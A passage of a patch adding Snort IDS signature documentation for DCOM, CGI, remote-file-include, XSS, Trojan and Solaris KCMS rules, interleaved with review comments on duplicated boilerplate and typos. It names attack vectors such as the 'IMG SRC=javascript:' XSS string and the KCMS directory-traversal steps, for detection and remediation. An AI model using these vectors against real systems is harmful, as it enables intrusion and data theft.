+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
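Review bot: this file is byte-for-byte identical to 3165.txt earlier in this patch (and to 3348.txt later), so the documentation for sid 3284 does not say what distinguishes this rule from the other two DCOM rules; each should state which RPC request or interface it inspects. As in those files, the Attack Scenarios text ("overly long filename via a network share") does not match the Detailed Information about malformed RPC data, "Expoit" is a typo for "Exploit", and Additional References should cite the vendor bulletin rather than being empty.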
--- /dev/null
+++ b/doc/signatures/1933.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1933
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
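Review bot: this file duplicates 1850.txt unchanged, so the documentation for sid 1933 does not name the CGI script or vulnerability the rule detects; the Summary, Detailed Information and Additional References should be made specific to this rule. Same typos as the original: "running ona web server" should be "running on a web server" and "attackers choosing" should be "attacker's choosing".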
--- /dev/null
+++ b/doc/signatures/2158.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+2158
+
+--
+Summary:
+This event is generated when an invalid BGP session is detected. 
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event indicates that an invalid Border Gateway Protocol (BGP) packet has been detected.
+
+BGP packets must have a datasize of at least 20 bytes. This event indicates that a BGP packet was detected with a datasize less than this amount. TCPDump may enter an endless loop trying to process this packet.
+
+--
+Affected Systems:
+This BGP packet may cause problems with TCPDump.
+
+--
+Attack Scenarios:
+An attacker would need to craft a special BGP packet with a type of 0 or a datasize of less than 20 bytes.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
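Review bot: Impact is given as "Unknown." although the Detailed Information two sections later states the concrete impact: tcpdump may enter an endless loop on this packet, i.e. a denial of service against the monitoring tool. State that under Impact. The Attack Scenarios text mentions "a type of 0 or a datasize of less than 20 bytes" while Detailed Information only describes the datasize check; make the two consistent so the reader knows exactly which conditions the rule tests. Affected Systems should list the tcpdump versions that have the bug rather than "This BGP packet may cause problems with TCPDump", Corrective Action lacks a terminating period, and the extra blank line under Additional References should go.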
--- /dev/null
+++ b/doc/signatures/100000600.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000600
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_markpaid.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"inv_markpaid.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
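Review bot: the third Detailed Information paragraph and the whole Attack Scenarios section are boilerplate about weak credential checks and do not describe a remote file include; for sid 100000600 the scenario is an attacker supplying a URL in the "admin_template_path" parameter of inv_markpaid.php so that the server fetches and executes remote code. Rewrite Attack Scenarios around that, and since the script is PHP, Corrective Action could add that disabling remote file inclusion in the interpreter configuration (allow_url_include / allow_url_fopen) mitigates this class of bug independently of the vendor patch. Wording: "an exploitation attempt has been attempted" is redundant ("an exploitation attempt has been made"), "running ona web server" should be "running on a web server", and the blank line before "--" is missing after the Sid, Affected Systems and Contributors sections, unlike the other files in this patch.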
--- /dev/null
+++ b/doc/signatures/100000750.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000750
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Free QBoard" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "qb_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "qb_path" parameter in the "index.php" script used by the "Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
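Review bot: same problems as the Indexu file above: the Detailed Information third paragraph and Attack Scenarios describe credential weaknesses, not the remote file include via the "qb_path" parameter of index.php that sid 100000750 actually detects, so Attack Scenarios should describe a URL being supplied in that parameter instead. Corrective Action could mention disabling remote file inclusion in the PHP configuration (allow_url_include / allow_url_fopen) as a mitigation. Formatting: the two leading blank lines before "Rule:" should be removed, the paragraphs are not wrapped at the width used by the rest of the documentation, and the blank line before "--" is missing after Sid, Affected Systems and Contributors. "running ona web server" should be "running on a web server" and "has been attempted" is redundant after "exploitation attempt".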
--- /dev/null
+++ b/doc/signatures/100000112.txt
@@ -0,0 +1,68 @@
+Rule: 
+
+--
+Sid: 
+100000112
+
+-- 
+Summary: 
+This event is generated when the readfile.tcl script on a Nokia IPSO device is 
+accessed.
+
+-- 
+
+Impact: 
+Since the script does not perform any input validation, users can read any file 
+on the host operating system for which the script has permissions. 
+
+--
+Detailed Information:
+An attacker may specify any file on the host operating system, and if the 
+script has read permissions for that file, it will be displayed in the web 
+browser. Users must be able to log into the Nokia web gui to perform this 
+attack.
+
+--
+Affected Systems:
+Nokia IPSO 3.3 SP4
+Nokia IPSO 3.3 SP3
+Nokia IPSO 3.3 SP2
+Nokia IPSO 3.3 SP1
+Nokia IPSO 3.3
+Nokia IPSO 3.3.1
+Nokia IPSO 3.4
+Nokia IPSO 3.4.1
+Nokia IPSO 3.4.2
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited using a web browser, or an automated script.
+
+-- 
+
+Ease of Attack: 
+Simple, as attacks may be performed via a web browser.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Currently, no workarounds or patches are available.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
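Review bot: Corrective Action says "no workarounds or patches are available", but the Detailed Information notes that an attacker must be logged into the Nokia web GUI, so restricting access to the management interface to trusted administrative hosts is a workaround worth stating, as is auditing GUI accounts. The Summary says the event fires whenever readfile.tcl is accessed, so legitimate administrative use of that script will also alert; False Positives should say so rather than "None Known." The affected version list is fine, but Additional References is empty for a product-specific vulnerability and should carry the vendor or tracker reference. Formatting: several "--" separators have trailing whitespace and are followed by an extra blank line, unlike the other files.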
--- /dev/null
+++ b/doc/signatures/120.txt
@@ -0,0 +1,112 @@
+Rule:
+
+--
+Sid:
+120
+
+--
+Summary:
+Infector is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files
+and reboot the targeted machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Infector sever to
+programs normally started on boot. Due to the nature of this Trojan it 
+is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	117	Infector 1.x
+	120	Infector 1.6 Server to Client
+	121	Infector 1.6 Client to Server Connection Request
+
+This Trojan is commonly used to install other Trojan programs.
+
+The Trojan also makes changes to the system registry and win.ini file.
+
+Notification of an active server is achieved via IRC or ICQ.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+event is indicative of an existing infection being activated. Initial 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Apxil32.exe a backup 
+copy is made and usually named D3x32.drv.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
+
+Registry keys added are:
+
+	apxil32 = apxil32.exe
+
+Removal of this entry is required.
+
+Delete the file <drive>:\WINDOWS\Apxil32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected 
+machine is recommended.
+
+A change is also made to the win.ini file, the line run=apxil32.exe 
+apxil32.exe is added and should be deleted.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS315
+http://www.whitehats.com/info/IDS502
+http://www.whitehats.com/info/IDS503
+
+Diamond Computer Systems Security Advisory
+http://www.diamondcs.com.au/web/alerts/infector.htm
+
+Megasecurity:
+http://www.megasecurity.org/trojans/i/infector/Infector_all.html
+
+Simovits:
+http://www.simovits.com/trojans/tr_data/y1627.html
+
+--
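Review bot: the structure of this file diverges from the template used by the rest of the patch: there is no Affected Systems section (the Windows 95/98/ME list sits under Detailed Information instead), and the Ease of Attack section contains the file location of the Trojan server (Apxil32.exe and its D3x32.drv backup copy), which belongs under Detailed Information or Corrective Action. Under Corrective Action, "Registry keys added are: apxil32 = apxil32.exe" describes a value added under the two Run/RunServices keys listed above it, not a key, so say "value". Typo: "Infector sever" should be "Infector server". The Corrective Action header is followed by a blank line before its text, unlike the other sections.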
--- /dev/null
+++ b/doc/signatures/3348.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3348
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
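Review bot: this is the third identical copy of the DCOM documentation in this patch (3165.txt, 3284.txt, 3348.txt), so sid 3348 is not documented at all in any way that distinguishes it; state which RPC request or interface this particular rule inspects. The Attack Scenarios line about "an overly long filename via a network share" still does not match the Detailed Information about malformed RPC data, "Expoit" should be "Exploit", and Additional References should cite the vendor bulletin.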
--- /dev/null
+++ b/doc/signatures/1193.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1193
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
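Review bot: this file is an unchanged copy of 1231.txt earlier in the patch and still does not say which web server request or application vulnerability sid 1193 matches; make the Summary and Detailed Information specific to this rule and add the advisory under Additional References, which is empty despite "Exploits exist." "attackers choosing" should be "attacker's choosing".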
--- /dev/null
+++ b/doc/signatures/1667.txt
@@ -0,0 +1,75 @@
+Rule:
+--
+Sid:
+1667
+--
+Summary:
+This event indicates that a cross-site scripting attack using the "img 
+src=javascript" vulnerability is being attempted, or a potential 
+attacker is testing your site to determine if it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site.   Attackers can potentially gain access to your users 
+cookies or session ids, allowing the attacker to impersonate your 
+user.   They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input and then uses that input as 
+part of the HTML of a new page without filtering, the application is 
+vulnerable to cross-site scripting.  The traditional means of exploiting
+this is to embed a "<SCRIPT>" tag into the input.   However, as many 
+applications now look for this attack vector, exploitation of the 
+ability to use "IMG SRC=javascript:" to embed javascript without the 
+script tag is becoming more common.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim.  The email will contain a link to a 
+specially crafted URL which contains the exploit.   When the victim 
+clicks on the link, they are directed to the vulnerable web site and the
+attack code is executed by their browser.
+
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable.  Finding vulnerabilities in other, including proprietary, 
+web applications is fairly trivial and existing exploit code could 
+easily be modified to take advantage of newly discovered 
+vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the "IMG SRC=javascript:" directive 
+could trigger this alert under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, 
+contact the authors or vendor and see if there is a patch or newer 
+version.   If the application is proprietary to you or your company, 
+ensure that it properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+iDefense
+http://www.idefense.com/idpapers/XSS.pdf
+
+--
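Review bot: Corrective Action only mentions validating input; for cross-site scripting the defence the page itself describes (input used "as part of the HTML of a new page without filtering") is output encoding of user-supplied data when it is written into HTML, so say "validates input and encodes output" to match the Detailed Information. The False Positives section could also note that any request body or URL legitimately carrying the string "IMG SRC=javascript:" (for example a site that lets users post HTML) will trigger the rule, since the Summary says the rule matches that pattern. Typos and formatting: "legimately" should be "legitimately", "your users cookies" should be "your users' cookies", the runs of three spaces after periods should be single spaces, and the blank lines before "--" after "Rule:" and the Sid are missing, unlike the other files.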
--- /dev/null
+++ b/doc/signatures/1642.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1642
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
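Review bot: third unchanged copy of the generic CGI text (1850.txt, 1933.txt, 1642.txt); the documentation for sid 1642 should name the script or application the rule matches and reference its advisory instead of the boilerplate. Same typos as the others: "running ona web server" should be "running on a web server" and "attackers choosing" should be "attacker's choosing".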
--- /dev/null
+++ b/doc/signatures/2349.txt
@@ -0,0 +1,55 @@
+Rule:  
+
+--
+Sid:
+2349
+
+--
+Summary:
+This event is generated when an attempt is made to enumerate the printer
+service on a system using DCE RPC.
+
+--
+Impact:
+Intelligence gathering.
+
+--
+Detailed Information:
+This rule checks for an attempt to enumerate a print spool service using DCE RPC. 
+This may be an attempt to check for printer and printer services available on a
+host.
+
+--
+Affected Systems:
+	All Microsoft DCE RPC enabled systems
+	
+--
+Attack Scenarios:
+An attacker may identify the print service being used and exploit that
+information in further attacks against the system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
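Review bot: the Corrective Action section is empty. Consistent with the other DCE RPC files in this patch, it should at least advise blocking DCE RPC and SMB access (TCP/UDP 135, 139, 445) from untrusted networks and reviewing which hosts need to reach the print spooler. False Positives "None known" is doubtful for a print spooler enumeration rule: Windows clients and print management tools enumerate spooler services as a matter of course, so the same $EXTERNAL_NET caveat given in 3454.txt applies here and should be stated. Minor: the Ease of Attack, False Positives and False Negatives entries lack terminating periods, and the line after "All Microsoft DCE RPC enabled systems" is a stray tab.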
--- /dev/null
+++ b/doc/signatures/700.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+700
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
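Review bot: the Affected Systems section is empty even though the Summary names the product; it should list Microsoft SQL Server (and the client, since Detailed Information mentions "server or client") with the affected versions. The Summary refers to "a known vulnerability in Microsoft SQL" without saying which one or what request the rule matches; that, and the corresponding advisory under Additional References, is what an analyst needs to triage sid 700. Minor: the double space after "client." in Detailed Information.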
--- /dev/null
+++ b/doc/signatures/2007.txt
@@ -0,0 +1,90 @@
+Rule:
+
+--
+Sid:
+2007
+
+--
+Summary:
+KCMS (Kodak Color Management System) is an RPC (Remote Procedure Call)
+service for Sun Solaris operating systems. It is able to read profiles
+stored on remote machines. It is possible for an attacker to bypass
+directory traversal checks and read any file on the remote system.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources on the machine not limited to user accounts
+and business data.
+
+--
+Detailed Information:
+The attacker first needs to create a directory under
+/etc/openwin/devdata/profiles or /usr/openwin/etc/devdata/profiles,
+using the ToolTalk database server is one method of creating a
+directory. Once this has been achieved, the attacker is then able to
+perform the directory traversal.
+
+The directory traversal allows the attacker to read any file on the
+compromised system. Once a sensitive system file such as the system
+password database has been retrieved, the attacker may use other tools
+at his leisure to discover username and password information. This may
+lead to further system compromise.
+
+The KCMS daemon runs with root privileges and is typically started on
+boot via inetd. The ToolTalk database server is also commonly installed
+and started in this manner. The KCMS daemon usually listens on TCP port
+32871 although this can vary.
+
+--
+Affected Systems:
+	Sun Microsystems Solaris 2.5.1 (Sparc/Intel)
+	Sun Microsystems Solaris 2.6 (Sparc/Intel)
+	Sun Microsystems Solaris 7 (Sparc/Intel)
+	Sun Microsystems Solaris 8 (Sparc/Intel)
+	Sun Microsystems Solaris 9 (Sparc/Intel)
+
+--
+Attack Scenarios:
+The ToolTalk database server procedure TT_ISBUILD can be used to create
+a directory named TT_DB anywhere on a remote system. Creation of this
+directory then allows the attacker to use directory traversal to further
+compromise the machine.
+
+--
+Ease of Attack:
+Once the directory has been created, further compromise is simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the KCMS daemon in the file /etc/inetd.conf. Kill any running
+KCMS processes and restart the inet daemon.
+
+Configure your firewall to restrict external access to the TCP and UDP
+port 111 used by the RPC port mapper service and the range used by RPC
+services, typically 32700 to 34000.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/850785
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0027
+
+--
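Review bot: False Negatives reads "None Known" while Detailed Information states "The KCMS daemon usually listens on TCP port 32871 although this can vary"; if the rule keys on that port, False Negatives should say the event is missed when the RPC port mapper assigns the KCMS daemon a different port, the way 2552.txt documents its port dependency. Also the Detailed Information sentence "using the ToolTalk database server is one method of creating a directory" is a comma splice on the preceding clause; split it into its own sentence.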
--- /dev/null
+++ b/doc/signatures/100000799.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000799
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "c4" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
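Review bot: The Impact and Detailed Information text is the remote-file-include boilerplate and overstates a cross site scripting issue: "Possible execution of arbitrary code of the attackers choosing" and "execute system binaries" describe server-side compromise, whereas XSS in the "c4" parameter of "blogroll.php" runs script in a victim's browser, as the Attack Scenarios section ("steal information from a user clicking on that link") correctly says. Reword Impact around client-side information disclosure. Formatting: the "--" separators after the Sid, Affected Systems and Contributors sections lack the blank line used elsewhere in the set.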
--- /dev/null
+++ b/doc/signatures/399.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+399
+
+--
+
+Summary:
+This event is generated when An ICMP Host Unreachable datagram is detected on the network.  
+
+--
+
+Impact:
+Routers will generate this message when the route to the destination host on a directly connected network is not available.  This occurs when no ARP response is received from the destination network.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
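Review bot: Typos in Summary and Detailed Information: "when An ICMP Host Unreachable" should read "an", and "could indication routing problems" should read "could indicate". The file also omits the Affected Systems section every other signature carries; add one (for instance "All.") so the template stays uniform. The Impact section describes when routers emit the message rather than the impact of the event; consider moving that text into Detailed Information and stating Impact as informational.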
--- /dev/null
+++ b/doc/signatures/100000376.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000376
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_db_utilities.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
